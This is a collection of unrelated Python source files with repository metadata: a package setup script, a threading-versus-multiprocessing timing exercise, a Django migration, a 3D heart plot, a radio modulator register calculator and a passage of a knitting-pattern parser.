    'Programming Language :: Python :: 2',
    'Programming Language :: Python :: 2.6',
    'Programming Language :: Python :: 2.7',
    'Programming Language :: Python :: 3',
    'Programming Language :: Python :: 3.3',
    'Programming Language :: Python :: 3.4',
    'Programming Language :: Python :: 3.5',
    'Programming Language :: Python :: 3.6',
    'Programming Language :: Python :: 3.7',
    'Programming Language :: Python :: Implementation :: CPython',
    'Topic :: Education',
    'Topic :: Scientific/Engineering :: Atmospheric Science',
    'Topic :: Scientific/Engineering :: Chemistry',
    'Topic :: Scientific/Engineering :: Physics',
]
# Short description and space-separated search keywords shown on PyPI.
description = 'Heat transfer component of Chemical Engineering Design Library (ChEDL)'
keywords = ('heat-transfer heat-exchanger air-cooler tube-bank condensation '
            'boiling chemical-engineering mechanical-engineering pressure-drop '
            'radiation process-simulation engineering insulation flow-boiling '
            'nucleate-boiling reboiler cross-flow')
# NOTE(review): open('README.rst').read() below leaves the handle to the GC
# and requires the file to exist at build time — standard for setup.py but
# worth knowing when packaging from a partial checkout.
setup(
  name = 'ht',
  packages = ['ht'],
  license='MIT',
  version = '0.1.54',
  description = description,
  author = 'Caleb Bell',
  long_description = open('README.rst').read(),
  platforms=["Windows", "Linux", "Mac OS", "Unix"],
  author_email = 'Caleb.Andrew.Bell@gmail.com',
  url = 'https://github.com/CalebBell/ht',
  download_url = 'https://github.com/CalebBell/ht/tarball/0.1.54',
  keywords = keywords,
  classifiers = classifiers,
  install_requires=['fluids>=0.1.77', 'numpy>=1.5.0', 'scipy>=0.9.0'],
  package_data={'ht': ['data/*']},
  extras_require = {
      'Coverage documentation': ['wsgiref>=0.1.2', 'coverage>=4.0.3', 'pint']
  },
)
| [
"55740158+mylenre@users.noreply.github.com"
] | 55740158+mylenre@users.noreply.github.com |
67d85dfc6f8f78470a4739d54c6e04b4e9b08ee9 | ab8e63babb6b412222aa5a7806728a171a5535d9 | /prat4/ex1_a.py | a8a337bebdc33f72c634137b6ddaa3f31db82065 | [] | no_license | tomasfj/programacao-distribuida | 90237839593982860ed6faaed816a423dfa52172 | b0c717cb0be7c13d8ef9e34c9cf963e1d46e1237 | refs/heads/master | 2021-05-17T05:27:21.175762 | 2020-04-26T15:34:20 | 2020-04-26T15:34:20 | 250,649,160 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,162 | py | '''
Estudar os tempos de execução:
. sequencial
. multithread
. multiprocessos
para cada uma das funções:
. fibonacci
. url
. readFile
Analisar resultados.
'''
from threading import Thread
import urllib.request
import time
from multiprocessing import Process
# Sequential execution
class nothreads_object(object):
    """Plain object wrapper so the sequential run mirrors the Thread/Process API."""
    def run(self):
        # Exactly one workload is enabled at a time; the same choice should be
        # made in threads_object and process_object so timings are comparable.
        #function_to_run_fibbo()
        function_to_run_url()
        #function_to_run_file()
def non_threaded(num_iter):
    """Run the selected workload sequentially, num_iter times, on the main thread."""
    runners = [nothreads_object() for _ in range(int(num_iter))]
    for runner in runners:
        runner.run()
# Multithreaded execution
class threads_object(Thread):
    """Thread whose run() executes the selected benchmark workload."""
    def run(self):
        # Keep the enabled workload in sync with nothreads_object/process_object.
        #function_to_run_fibbo()
        function_to_run_url()
        #function_to_run_file()
def threaded(num_threads):
    """Run the selected workload concurrently on num_threads Python threads."""
    workers = [threads_object() for _ in range(int(num_threads))]
    for worker in workers:
        worker.start()
    # Wait for every worker so the caller's timing covers all of the work.
    for worker in workers:
        worker.join()
def show_results(func_name, results):
    """Print a label left-justified to 23 columns and the elapsed seconds."""
    print(f"{str(func_name):<23} {results:4.6f} seconds")
# Multiprocessing execution
class process_object(Process):
    """Process whose run() executes the selected benchmark workload."""
    def run(self):
        # Keep the enabled workload in sync with nothreads_object/threads_object.
        #function_to_run_fibbo()
        function_to_run_url()
        #function_to_run_file()
def processed(num_processes):
    """Run the selected workload in parallel across num_processes OS processes."""
    workers = [process_object() for _ in range(int(num_processes))]
    for worker in workers:
        worker.start()
    # Join every child so the caller's timing covers all of the work.
    for worker in workers:
        worker.join()
# functions to run
def function_to_run_fibbo(n_iter=100000):
    """CPU-bound workload: advance the Fibonacci recurrence n_iter times.

    :param n_iter: number of iterations (kept as a default of 100000 so the
        existing zero-argument callers behave exactly as before).
    :return: the n_iter-th Fibonacci number, with F(0) = 0, F(1) = 1.
    """
    a, b = 0, 1
    for _ in range(n_iter):
        # Simultaneous assignment fixes the original bug where `a = b` ran
        # before `b = a + b`, so b was merely doubled instead of the
        # sequence advancing.
        a, b = b, a + b
    return a
def function_to_run_url():
    """Network-bound workload: fetch https://google.com ten times.

    Each request reads only the first 1 KiB of the response; the ``with``
    block closes the response object.
    """
    for i in range(10):
        with urllib.request.urlopen("https://google.com") as f:
            f.read(1024)
def function_to_run_file(path="test.dat"):
    """Disk-bound workload: read 1000 chunks of 1 KiB from ``path``.

    The file handle is now closed via a context manager (the original opened
    the file and never closed it, leaking the handle). ``path`` defaults to
    the original hard-coded filename so existing callers are unchanged.
    Reads past end-of-file simply return ``b''``.
    """
    size = 1024
    with open(path, "rb") as file:
        for _ in range(1000):
            file.read(size)
# main: time the sequential, threaded and multiprocessing runners for an
# increasing amount of work (1, 2, 4, 8 units) and print each elapsed time.
if __name__ == "__main__":
    num_threads = [1,2,4,8]
    print("Starting tests")
    for i in num_threads:
        # sequential execution
        start = time.time()
        non_threaded(i)
        executionTime = time.time() - start
        show_results("non_threaded (%s iters)" %i, executionTime)
        # threaded execution
        start = time.time()
        threaded(i)
        executionTime = time.time() - start
        show_results("threaded (%s threads)" % i, executionTime)
        # multiprocessing execution
        start = time.time()
        processed(i)
        executionTime = time.time() - start
        show_results("processed (%s processes)" %i, executionTime)
    print("Iterations complete")
'''
Apresentação de resultados:
Fibonacci (F1)
Threads | Sequencial | Threaded | Processed
1 | 0.140220 s | 0.142309 s | 0.171712 s
2 | 0.278199 s | 0.276906 s | 0.162182 s
4 | 0.592690 s | 0.568686 s | 0.209662 s
8 | 1.138981 s | 1.127482 s | 0.313482 s
Análise: Durante todo o processo a execução Sequencial e Threaded obtiveram
resultados semelhantes enquanto que a execução por Processos obteve sempre
melhores resultados, excepto na primeira execução (1 thread).
À medida que o número de threads aumentou a execução por Processos
destacou-se em relação às outras (no que toca ao tempo de execução).
URL (F2)
Threads | Sequencial | Threaded | Processed
1 | 4.237558 s | 4.487031 s | 4.510582 s
2 | 8.526937 s | 5.060087 s | 4.090834 s
4 | 17.99895 s | 5.126970 s | 4.814211 s
8 | 33.76315 s | 5.157609 s | 5.259390 s
Análise: À medida que o número de threads/processos aumentou a solução
sequencial verificou um aumento no tempo de execução enquanto que as outras
duas soluções se mantiveram relativamente constantes.
ReadFile (F3)
Threads | Sequencial | Threaded | Processed
1 | 0.005640 s | 0.005557 s | 0.014764 s
2 | 0.010888 s | 0.009978 s | 0.019795 s
4 | 0.021694 s | 0.054544 s | 0.026143 s
8 | 0.043437 s | 0.111490 s | 0.044909 s
Análise: Neste caso a solução sequencial foi a apresentou melhores
resultados e a solução threaded acabou por ser a mais demorada.
''' | [
"noreply@github.com"
] | noreply@github.com |
29084ab0b03701b8d5c0589acbfcf5b0b0c42b01 | 3a009df40f634d41f4de9ece3c58703cebdc321f | /atm_analytics/analytics/migrations/0018_remove_atmcase_xfs_format.py | 7a0bce8f08a07148b9f16816b8115f51317d65b5 | [
"MIT"
] | permissive | ifreddyrondon/atm-analytics | 3dcdb7fc184fced13f8118fd1486a64b69c1ce3c | 654ba8993b05848cfb4a18ff2f6e4ee44ba7c246 | refs/heads/master | 2022-11-28T16:44:59.388168 | 2020-02-01T21:29:20 | 2020-02-01T21:29:20 | 63,739,156 | 0 | 1 | MIT | 2022-11-22T01:01:27 | 2016-07-20T01:15:12 | HTML | UTF-8 | Python | false | false | 359 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Drops the ``xfs_format`` field that migration 0017 added to ATMCase."""
    dependencies = [
        # must run after the migration that added the field being removed
        ('analytics', '0017_atmcase_xfs_format'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='atmcase',
            name='xfs_format',
        ),
    ]
| [
"spantons@gmail.com"
] | spantons@gmail.com |
8ce29595818ea2d4b7f8186cbb954cbdb7739d39 | a3ff13ecac60f891a3ebdcb4c72bf6a4b581a2d8 | /YCD/10.16公开课红心代码heart_3d.py | 307b46ff179ed773578ac66438fc7032e575e55a | [] | no_license | kekirk/pycode | 75533afc3018cba30d0abd3c29ab1c945b85504b | 06dab1a61d7b445cc19b41e4d281f62251e2583b | refs/heads/master | 2020-04-01T17:13:53.828118 | 2019-01-04T09:02:00 | 2019-01-04T09:02:00 | 153,419,332 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 707 | py | #!/usr/bin/env python
# coding: utf-8
# In[3]:
from pyecharts import Scatter3D
import numpy as np
# # 心形解析式
# # (x^2+9/4*y^2+z^2-1)^3-x^2*z^3-9/80*y^2*z^3=0
# In[5]:
scatter3D = Scatter3D("I Love You", width=1700, height=1000)
data = list()
# Sample the bounding box of the heart surface on a coarse grid.
x = list(np.linspace(-1.5, 1.5,150))
y = list(np.linspace(-1,1,100))
z = list(np.linspace(-1.5,1.5,100))
for a in x:
    for b in y:
        for c in z:
            # Keep points in a thin shell around the implicit heart surface
            # (x^2 + 9/4*y^2 + z^2 - 1)^3 - x^2*z^3 - 9/80*y^2*z^3 = 0.
            if -0.05<=(a**2+9.0/4.0*b**2+c**2-1)**3-a**2*c**3-9.0/80.0*b**2*c**3 <=0:
                data.append([a,b,c])
scatter3D.add("", data, is_visualmap=True, visual_range_color="red")
scatter3D.render()
# Jupyter-style trailing expression: renders the chart inline in a notebook.
scatter3D
# In[20]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
| [
"kekirk@163.com"
] | kekirk@163.com |
020f91f4d1a8a9caa5c59fe28145b52c554f09ff | bf4178e73f0f83781be6784d7587cb34a38d6edd | /platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/common/calculators/calc_modulator.py | d1572f6a1abc18443087ee2ab822b05f0a10716a | [] | no_license | kolbertv/ZigbeeSiliconV3 | 80d70515e93be1413c24cdcb3485f50c65a1564b | ab0bd8d4bb6c1048adef81d0e66d96006c2fabd9 | refs/heads/master | 2023-01-02T07:18:01.393003 | 2020-10-25T15:33:08 | 2020-10-25T15:33:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,642 | py | """Core CALC_Modulator Calculator Package
Calculator functions are pulled by using their names.
Calculator functions must start with "calc_", if they are to be consumed by the framework.
Or they should be returned by overriding the function:
def getCalculationList(self):
"""
#import math
from pyradioconfig.calculator_model_framework.Utils.CustomExceptions import CalculationException
from pyradioconfig.calculator_model_framework.interfaces.icalculator import ICalculator
from pyradioconfig.parts.common.calculators.calc_utilities import CALC_Utilities
from enum import Enum
from pycalcmodel.core.variable import ModelVariableFormat, CreateModelVariableEnum
from py_2_and_3_compatibility import *
class CALC_Modulator(ICalculator):
    """
    Calculates EFR32 modulator (TX) settings: symbol encoding variables,
    modulation index, TX baud-rate ratio, preamble bases and FSK mapping
    registers.
    """
    def __init__(self):
        # calculator version reported to the calculator framework
        self._major = 1
        self._minor = 0
        self._patch = 0
    def buildVariables(self, model):
        """Populates a list of needed variables for this calculator
        Args:
            model (ModelRoot) : Builds the variables specific to this calculator
        """
        # symbol_encoding
        var = self._addModelVariable(model, 'symbol_encoding', Enum, ModelVariableFormat.DECIMAL, 'Symbol Encoding Options')
        member_data = [
            ['NRZ', 0, 'Non Return Zero Coding'],
            ['Manchester', 1, 'Manchester Coding'],
            ['DSSS', 2, 'Direct Sequence Spread Spectrum Coding'],
        ]
        # Only Nerio (and Panther) support LINECODE Encoding, used for BLE Long Range
        if model.part_family.lower() not in ["dumbo","jumbo","nixi"]:
            member_data.append(['LINECODE', 3, 'Maps 0 to 0011 symbol and 1 to 1100 symbol'])
        var.var_enum = CreateModelVariableEnum(
            'SymbolEncodingEnum',
            'List of supported symbol encoding options',
            member_data)
        # manchester_mapping (comment fixed: previously a copy-paste of "symbol_encoding")
        var = self._addModelVariable(model, 'manchester_mapping', Enum, ModelVariableFormat.DECIMAL, 'Manchester Code Mapping Options for packet payload')
        member_data = [
            ['Default', 0, '0-bit corresponds to a 0 to 1 transition and 1-bit corresponds to 1 to 0 transition'],
            ['Inverted', 1, '0-bit corresponds to a 1 to 0 transition and 1-bit corresponds to 0 to 1 transition'],
        ]
        var.var_enum = CreateModelVariableEnum(
            'ManchesterMappingEnum',
            'List of supported Manchester Code options',
            member_data)
    def calc_tx_baud_rate_actual(self, model):
        """
        calculate actual TX baud rate from register settings
        Args:
            model (ModelRoot) : Data model to read and write variables from
        """
        fxo = model.vars.xtal_frequency.value
        txbr_ratio = model.vars.txbr_ratio_actual.value
        # inverse of the ratio computed in calc_txbr_value: ratio = fxo / (8 * baudrate)
        tx_baud_rate = fxo / (8.0 * txbr_ratio)
        model.vars.tx_baud_rate_actual.value = tx_baud_rate
    def calc_symbol_rates_actual(self, model):
        """
        derive actual bauds-per-symbol and bits-per-symbol from the symbol
        encoding, long-range (BLE LR) configuration and modulation format
        Args:
            model (ModelRoot) : Data model to read and write variables from
        """
        encoding = model.vars.symbol_encoding.value
        encodingEnum = model.vars.symbol_encoding.var_enum
        baud_per_symbol = 1
        if model.part_family.lower() in ["nerio", "panther", "lynx", "ocelot"]:
            if model.vars.MODEM_LONGRANGE_LRBLE.value == 1:
                # In case of BLE LR 125 kps, baud_per_symbol is 8
                if model.vars.FRC_CTRL_RATESELECT.value == 0:
                    baud_per_symbol = 8
                # In case of BLE LR 500 kps, baud_per_symbol is 2
                elif model.vars.FRC_CTRL_RATESELECT.value == 2:
                    baud_per_symbol = 2
                else:
                    raise ValueError("Invalid FRC_CTRL_RATESELECT value used in LONGRANGE configuration")
            if model.vars.FRC_CTRL_RATESELECT.value == 1:
                # NOTE(review): every other register read here uses `.value`; this
                # assigns the register-model object itself before comparing it to
                # an enum member below — confirm `.value` is not needed.
                encoding = model.vars.MODEM_CTRL6_CODINGB
                if encoding == encodingEnum.LINECODE:
                    baud_per_symbol *= 4
        if encoding == encodingEnum.DSSS:
            baud_per_symbol *= model.vars.dsss_len.value
        elif encoding == encodingEnum.Manchester:
            baud_per_symbol *= 2
        model.vars.baud_per_symbol_actual.value = baud_per_symbol
        if encoding == encodingEnum.DSSS:
            bits_per_symbol = model.vars.dsss_bits_per_symbol.value
        else:
            modFormat = model.vars.modulation_type.value
            modFormatEnum = model.vars.modulation_type.var_enum
            # 4-FSK and OQPSK carry two bits per symbol; everything else one
            if modFormat in [modFormatEnum.FSK4, modFormatEnum.OQPSK]:
                bits_per_symbol = 2
            else:
                bits_per_symbol = 1
        model.vars.bits_per_symbol_actual.value = bits_per_symbol
        #TODO: add support for ASK modulation
    def calc_modindex_value(self, model):
        """
        calculate MODINDEX value
        Equations from Table 5.25 in EFR32 Reference Manual (internal.pdf)
        Args:
            model (ModelRoot) : Data model to read and write variables from
        """
        fxo = model.vars.xtal_frequency.value * 1.0
        modformat = model.vars.modulation_type.value
        freq_dev_hz = model.vars.deviation.value * 1.0
        synth_res = model.vars.synth_res_actual.value
        shaping_filter_gain = model.vars.shaping_filter_gain_actual.value
        interpolation_gain = model.vars.interpolation_gain_actual.value
        if modformat == model.vars.modulation_type.var_enum.FSK2 or \
                modformat == model.vars.modulation_type.var_enum.FSK4:
            modindex = freq_dev_hz * 16.0 / (synth_res * shaping_filter_gain * interpolation_gain)
        elif modformat == model.vars.modulation_type.var_enum.OQPSK or \
                modformat == model.vars.modulation_type.var_enum.MSK:
            modindex = fxo / (synth_res * 2 * shaping_filter_gain * interpolation_gain)
        elif modformat == model.vars.modulation_type.var_enum.BPSK or \
                modformat == model.vars.modulation_type.var_enum.OOK or \
                modformat == model.vars.modulation_type.var_enum.DBPSK:
            modindex = 150.0 * 16 / (shaping_filter_gain * interpolation_gain)
        else:
            raise CalculationException("ERROR: %s modulation not yet supported!" % modformat)
            # NOTE(review): this return is unreachable (it follows the raise)
            return
        model.vars.modindex.value = modindex
    def calc_modindex_field(self, model):
        """
        convert desired modindex fractional value to MODINDEXM * 2^MODINDEXE
        Equations (5.13) of EFR32 Reference Manual (internal.pdf)
        Args:
            model (ModelRoot) : Data model to read and write variables from
        """
        modindex = model.vars.modindex.value
        # convert fractional modindex into m * 2^e format
        m, e = CALC_Utilities().frac2exp(31, modindex)
        # MODEINDEXE is a signed value
        if e < 0:
            e += 32
        # verify number fits into register (both fields are 5 bits wide)
        if m > 31:
            m = 31
        if e > 31:
            e = 31
        if m < 0:
            m = 0
        self._reg_write(model.vars.MODEM_MODINDEX_MODINDEXM, int(m))
        self._reg_write(model.vars.MODEM_MODINDEX_MODINDEXE, int(e))
    def calc_modindex_actual(self, model):
        """
        given register settings return actual MODINDEX as fraction
        Equations (5.13) of EFR32 Reference Manual (internal.pdf)
        Args:
            model (ModelRoot) : Data model to read and write variables from
        """
        m = model.vars.MODEM_MODINDEX_MODINDEXM.value
        e = model.vars.MODEM_MODINDEX_MODINDEXE.value
        # MODEINDEXE is a signed value (5-bit two's complement)
        if e > 15:
            e -= 32
        model.vars.modindex_actual.value = 1.0 * m * 2**e
    def calc_modulation_index_actual(self, model):
        """
        calculate the actual modulation index for given PHY
        This is the traditional modulation index as 2 * deviation / baudrate
        the one above we call modindex and is specific value used by EFR32
        Args:
            model (ModelRoot) : Data model to read and write variables from
        """
        baudrate_hz = model.vars.tx_baud_rate_actual.value
        tx_deviation = model.vars.tx_deviation_actual.value
        model.vars.modulation_index_actual.value = tx_deviation * 2.0 / baudrate_hz
    def calc_tx_freq_dev_actual(self, model):
        """
        given register setting return actual frequency deviation used in the modulator
        Using Equations in Table 5.25 of EFR32 Reference Manual (internal.pdf)
        Args:
            model (ModelRoot) : Data model to read and write variables from
        """
        modformat = model.vars.modulation_type.value
        modindex = model.vars.modindex_actual.value
        synth_res = model.vars.synth_res_actual.value
        shaping_filter_gain = model.vars.shaping_filter_gain_actual.value
        interpolation_gain = model.vars.interpolation_gain_actual.value
        # inverse of the FSK branch in calc_modindex_value; deviation is only
        # meaningful for (G)FSK formats, so everything else reports 0 Hz
        if modformat == model.vars.modulation_type.var_enum.FSK2 or \
                modformat == model.vars.modulation_type.var_enum.FSK4:
            freq_dev_hz = modindex * (synth_res * shaping_filter_gain * interpolation_gain) / 16.0
        else:
            freq_dev_hz = 0.0
        model.vars.tx_deviation_actual.value = freq_dev_hz
    # calculate TX baudrate ratio
    # Using Equation (5.7) of EFR32 Reference Manual (internal.pdf)
    def calc_txbr_value(self, model):
        """
        calculate TX baudrate ratio
        Using Equation (5.7) of EFR32 Reference Manual (internal.pdf)
        Args:
            model (ModelRoot) : Data model to read and write variables from
        """
        fxo = model.vars.xtal_frequency.value
        baudrate = model.vars.baudrate.value
        # calculate baudrate to fxo ratio
        ratio = fxo / (baudrate * 8.0)
        model.vars.txbr_ratio.value = ratio
    def calc_txbr_reg(self, model):
        """
        given desired TX baudrate ratio calculate TXBRNUM and TXBRDEN
        that gets as close as possible to the ratio.
        Note that we start from the highest possible value for TXBRDEN
        and go down since having largest possible values in these register
        to have better phase resolution in OQPSK and MSK (see end of section
        5.6.5 in the manual)
        Args:
            model (ModelRoot) : Data model to read and write variables from
        """
        ratio = model.vars.txbr_ratio.value
        # find best integer ratio to match desired ratio
        # NOTE(review): if no denominator meets the 0.003 tolerance the loop
        # falls through with den == 1 and num == ratio — confirm acceptable.
        for den in xrange(255, 0, -1):
            num = ratio * den
            if abs(round(num) - num) < 0.003 and num < 32768:
                break
        self._reg_write(model.vars.MODEM_TXBR_TXBRNUM, int(round(num)))
        self._reg_write(model.vars.MODEM_TXBR_TXBRDEN, int(den))
    def calc_txbr_actual(self, model):
        """
        given register values calculate actual TXBR ratio implemented
        Args:
            model (ModelRoot) : Data model to read and write variables from
        """
        num = model.vars.MODEM_TXBR_TXBRNUM.value * 1.0
        den = model.vars.MODEM_TXBR_TXBRDEN.value
        ratio = num / den
        model.vars.txbr_ratio_actual.value = ratio
    def calc_txbases_reg(self, model):
        """
        set TXBASES based on preamble length and base bits value
        Args:
            model (ModelRoot) : Data model to read and write variables from
        """
        # NOTE(review): true division, truncated by int() below — assumes the
        # preamble length divides evenly by the pattern length; confirm.
        txbases = model.vars.preamble_length.value / model.vars.preamble_pattern_len_actual.value
        # Some input combinations can produce values out of range for the register fields,
        # such as applying ludicrously long preamble lengths.
        # MCUW_RADIO_CFG-793
        # TODO: is would be best to query the register model to determine these two fields are 7 bits wide
        if (txbases) > 0xffff:
            raise CalculationException("Calculated TX preamble sequences (TXBASE) value of %s exceeds limit of 65535! Adjust preamble inputs." % txbases )
        self._reg_write(model.vars.MODEM_PRE_TXBASES, int(txbases))
    def calc_symbol_encoding(self, model):
        """
        set CODING register
        Args:
            model (ModelRoot) : Data model to read and write variables from
        """
        encoding = model.vars.symbol_encoding.value
        # map encoding enum to the MODEM_CTRL0_CODING field value (NRZ/LINECODE -> 0)
        if encoding == model.vars.symbol_encoding.var_enum.DSSS:
            coding = 2
        elif encoding == model.vars.symbol_encoding.var_enum.Manchester:
            coding = 1
        else:
            coding = 0
        self._reg_write(model.vars.MODEM_CTRL0_CODING, coding)
    def calc_mapfsk_reg(self, model):
        """
        program MAPFSK register based on input
        Args:
            model (ModelRoot) : Data model to read and write variables from
        """
        mod_format = model.vars.modulation_type.value
        manchester_map = model.vars.manchester_mapping.value
        fsk_map = model.vars.fsk_symbol_map.value
        encoding = model.vars.symbol_encoding.value
        FSKMAP_LOOKUP = {
            model.vars.fsk_symbol_map.var_enum.MAP0.value: 0,
            model.vars.fsk_symbol_map.var_enum.MAP1.value: 1,
            model.vars.fsk_symbol_map.var_enum.MAP2.value: 2,
            model.vars.fsk_symbol_map.var_enum.MAP3.value: 3,
            model.vars.fsk_symbol_map.var_enum.MAP4.value: 4,
            model.vars.fsk_symbol_map.var_enum.MAP5.value: 5,
            model.vars.fsk_symbol_map.var_enum.MAP6.value: 6,
            model.vars.fsk_symbol_map.var_enum.MAP7.value: 7,
        }
        mapfsk = FSKMAP_LOOKUP[fsk_map.value]
        if mod_format != model.vars.modulation_type.var_enum.FSK4:
            # if we're using Manchester encoding (or any FSK modulation actually),
            # then only MAP0 and MAP1 are valid
            if mapfsk > 1:
                raise CalculationException("Invalid fsk symbol map value for modulation type selected.")
        if encoding == model.vars.symbol_encoding.var_enum.Manchester:
            # if we're using Manchester encoding,
            # then only MAP0 and MAP1 are valid
            if mapfsk > 1:
                raise CalculationException("Invalid fsk_symbol_map value for Manchester encoding")
            # if we're using inverted Manchester encoding, then flip the polarity of the fsk
            # map. This flips the polarity of the entire transmission, including the preamble
            # and syncword. We don't want the preamble and syncword flipped, so we'll invert those
            # registers elsewhere
            if manchester_map != model.vars.manchester_mapping.var_enum.Default:
                mapfsk ^= 1
        self._reg_write(model.vars.MODEM_CTRL0_MAPFSK, mapfsk)
| [
"1048267279@qq.com"
] | 1048267279@qq.com |
eabcf21c690f19f586bbd3c12d8f48ca73b8efff | 1ba18a08d38c693cc20d0f773a6f3a9e23c9560a | /knitspeak_compiler/knitspeak_interpreter/knitspeak_actions.py | fbfe0822362a700cdecd4c3174bb70a1ff2ae88e | [] | no_license | mhofmann-uw/599-Knitting-Assignments | 9d77b8911b187e1e51c80a217fb85c18a17ce5f1 | 136cde8d63152155c634f3b0680b53c1fd56775a | refs/heads/main | 2023-08-24T18:07:38.909553 | 2021-11-09T19:56:29 | 2021-11-09T19:56:29 | 409,295,658 | 0 | 8 | null | null | null | null | UTF-8 | Python | false | false | 12,241 | py | """actions are called by parglare while parsing a file to reduce the abstract syntax tree as it is processed"""
from typing import Dict, List, Tuple, Union
from knitspeak_compiler.knitspeak_interpreter.closures import Operation_Closure, Num_Closure, Num_Variable_Closure, Num_Assignment_Closure, Iterator_Closure, Current_Row_Closure
from parglare import get_collector
from parglare.parser import Context
from knitspeak_compiler.knitspeak_interpreter.cable_definitions import Cable_Definition
from knitspeak_compiler.knitspeak_interpreter.stitch_definitions import Stitch_Definition
# some boiler plate parglare code
action = get_collector()
@action
def course_ids(context, nodes) -> List[Union[int, Num_Closure, Iterator_Closure]]:
    """
    The action to simplify data in a courseIdDefinition
    :param context: the context to gather symbol table data
    :param nodes: the nodes of the parsed content, of length 2 or 3
    :return: a list of course_id integers (or number/iterator closures)
    """
    row_node = 1
    course_range = nodes[0]
    if len(nodes) == 3:  # 3-node form carries a side keyword ("rs"/"ws") in nodes[1]
        row_node = 2
        if "rs" == nodes[1]:
            course_range = [1]  # right-side rows start with course 1 (odd rows)
        else:
            course_range = [2]  # wrong-side rows start with course 2 (even rows)
        # record the side-wide range under "all_rs"/"all_ws" for later lookups
        context.parser.symbolTable[f"all_{nodes[1]}"] = course_range
    # matches "row"/"rows" (and would match "round(s)", which is unsupported)
    assert "ow" in nodes[row_node], "Currently this parser only accepts rows (not rounds)"
    return course_range
@action
def course_statement(_, nodes) -> Dict[str, list]:
    """
    The action that reduces a courseStatement into its course ids and
    stitch operations.
    :param _: unused context provided by parglare
    :param nodes: nodes[0] is a flag (non-None when the row's operations
        should be worked from the opposite side), nodes[1] the course ids,
        nodes[2] the stitch operations
    :return: dict mapping "courseIds" to the course id list and
        "stitch-operations" to the stitch operation tuples
    """
    flip_flag = nodes[0]
    ids = nodes[1]
    operations = nodes[2]
    if flip_flag is not None:
        operations = _flipStitchList(operations)
    return {"courseIds": ids, "stitch-operations": operations}
def _flipStitchList(operation_tuple_list: List[tuple]) -> list:
    """
    flips the operations in the list as if they were worked from the opposite side (knits vs purls)
    :param operation_tuple_list: the list of (operation, repeat-info) tuples to flip
    :return: the flipped operations in the original order
    """
    newStitchDefs = []
    for operation in operation_tuple_list:
        stDef = operation[0]
        if type(stDef) is list:
            # nested stitch group: flip its members recursively, keep its repeat info
            newStitchDefs.append((_flipStitchList(stDef), operation[1]))
        else:
            # single stitch/cable definition; copy_and_flip is provided by the
            # stitch/cable definition classes and returns the opposite-side form
            stDef = stDef.copy_and_flip()
            newStitchDefs.append((stDef, operation[1]))
    return newStitchDefs
@action
def side(_, nodes: str) -> str:
    """
    Normalize a parsed side token ("RS", "(ws)", ...) to lowercase with any
    surrounding parentheses removed.
    :param _: the unused context provided by action
    :param nodes: the single node carrying the side text
    :return: "rs" or "ws"
    """
    text = nodes
    if text.startswith("("):
        text = text[1:]
    if text.endswith(")"):
        text = text[:-1]
    return text.lower()
@action
def course_id_list(_, nodes: list) -> List[Union[int, Num_Closure, Iterator_Closure]]:
    """
    course_id_list: course_id_list commaAnd course_id | course_id;
    :param _: context data ignored but passed by parglare
    :param nodes: the node data passed by the parser
    :return: a list of course_identifiers processed from the course_id_list
    """
    # Normalize the one-node and three-node grammar forms into a single list.
    if len(nodes) == 1:
        if type(nodes[0]) is int or isinstance(nodes[0], Num_Closure) or isinstance(nodes[0], Iterator_Closure):
            course_identifiers = [nodes[0]]
        else: # nodes is a course_identifiers list already
            course_identifiers = nodes[0]
    else:
        course_identifiers = nodes[0]
        course_identifiers.append(nodes[2])
    # Flatten one level: an element may itself be a list of course ids.
    topList = []
    for cId in course_identifiers:
        if type(cId) is int or isinstance(cId, Num_Closure) or isinstance(cId, Iterator_Closure):
            topList.append(cId)
        else: # cID is course_identifiers list
            for subId in cId:
                topList.append(subId)
    course_identifiers = topList
    # Deduplicate while preserving first-seen order.
    courseSet = set()
    unique_c_ids = []
    for cId in course_identifiers:
        # NOTE(review): this condition tests nodes[0], not cId — whenever the
        # first node is a closure, deduplication is skipped for every element;
        # confirm that is intended rather than `isinstance(cId, ...)`.
        if isinstance(nodes[0], Num_Closure) or isinstance(nodes[0], Iterator_Closure):
            unique_c_ids.append(cId)
        elif cId not in courseSet:
            unique_c_ids.append(cId)
            courseSet.add(cId)
    return unique_c_ids
@action
def stitch_statement_List(_, nodes) -> List[tuple]:
    """
    Reduce a stitch statement list: either pass a single statement through
    (wrapped in a list) or append/extend the new statement(s) onto the
    accumulated list.
    :param _: parglare context provided but not needed
    :param nodes: the nodes passed by parglare; 1 node for a single
        statement, 3 nodes (list, separator, statement) for the recursive form
    :return: the accumulated list of stitch statement tuples
    """
    if len(nodes) == 1:
        if type(nodes[0]) is list:
            return nodes[0]
        else:
            return [nodes[0]]
    else:
        stitchList = nodes[0]
        if type(nodes[2]) is list:
            stitchList.extend(nodes[2])
        else:
            stitchList.append(nodes[2])
        # The original version also built a flattened `topList` here but then
        # returned `stitchList` unchanged, so that computation was dead code
        # and has been removed. (If flattening was intended, the return value
        # would have to change too, which would alter behavior.)
        return stitchList
@action
def repeated_Stitch(_, nodes: list) -> Tuple[Union[Stitch_Definition, Cable_Definition], Tuple[bool, int]]:
    """
    Reduce a stitch operation plus an optional repeat count.
    :param _: context provided by parglare but not used
    :param nodes: nodes[0] is the stitch operation; nodes[1] is the repeat
        count, or None meaning a single repetition
    :return: the operation paired with (True, count); True marks a fixed
        (static) repeat as opposed to rep_condition's conditional (False, ...)
    """
    repeat_count = nodes[1] if nodes[1] is not None else 1
    nodes[1] = repeat_count
    return nodes[0], (True, repeat_count)
@action
def repeated_stitch_group(_, nodes):
    """
    Reduce a stitch group plus an optional repeat count.
    :param _: context provided by parglare but not used
    :param nodes: nodes[0] is the stitch group; nodes[1] is the repeat count
        or None (defaulting to a single repetition)
    :return: (group, repeat_count)
    """
    group, repeats = nodes[0], nodes[1]
    if repeats is None:
        repeats = 1
        nodes[1] = repeats
    return group, repeats
# todo may be deprecated?
@action
def static_stitch_group(_, nodes) -> Tuple[List[tuple], Tuple[bool, int]]:
    """
    Reduce a bracketed stitch group repeated a fixed number of times.
    :param _: the context passed by parglare but not used
    :param nodes: nodes[1] is the stitch statement list to be repeated;
